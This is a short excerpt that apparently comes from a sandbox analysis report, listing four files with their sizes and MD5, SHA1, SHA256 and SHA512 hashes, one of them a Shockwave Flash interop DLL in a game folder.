SHA256bd54ad7a25594dc823572d9b23a3490ff6b8b1742a75e368d110421ab08909b2
SHA512b5d863ea38816c18f7778ef12ea4168ceb0dae67704c0d1d4a60b0237ca6e758c1dfc5c28d4fc9679b0159de25e56d5dfff8addacd7a9c52572674d90c424946
-
\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\AxInterop.ShockwaveFlashObjects.dll
Filesize17KB
MD5451112d955af4fe3c0d00f303d811d20
SHA11619c35078ba891091de6444099a69ef364e0c10
SHA2560d57a706d4e10cca3aed49b341a651f29046f5ef1328878d616be93c3b4cbce9
SHA51235357d2c4b8229ef9927fa37d85e22f3ae26606f577c4c4655b2126f0ecea4c69dae03043927207ca426cc3cd54fc3e72124369418932e04733a368c9316cf87
-
Filesize
112KB
MD5829e4805b0e12b383ee09abdc9e2dc3c
SHA15a272b7441328e09704b6d7eabdbd51b8858fde4
SHA25637121ecb7c1e112b735bd21b0dfe3e526352ecb98c434c5f40e6a2a582380cdd
SHA512356fe701e6788c9e4988ee5338c09170311c2013d6b72d7756b7ada5cda44114945f964668feb440d262fb1c0f9ca180549aafd532d169ceeadf435b9899c8f6
-
Filesize
111KB
MD5e87a04c270f98bb6b5677cc789d1ad1d
SHA18c14cb338e23d4a82f6310d13b36729e543ff0ca
SHA256e03520794f00fb39ef3cfff012f72a5d03c60f89de28dbe69016f6ed151b5338
SHA5128784f4d42908e54ecedfb06b254992c63920f43a27903ccedd336daaeed346db44e1f40e7db971735da707b5b32206be1b1571bc0d6a2d6eb90bbf9d1f69de13
-
Filesize
3.4MB
MD584c82835a5d21bbcf75a61706d8ab549
SHA15ff465afaabcbf0150d1a3ab2c2e74f3a4426467
SHA256ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
SHA51290723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244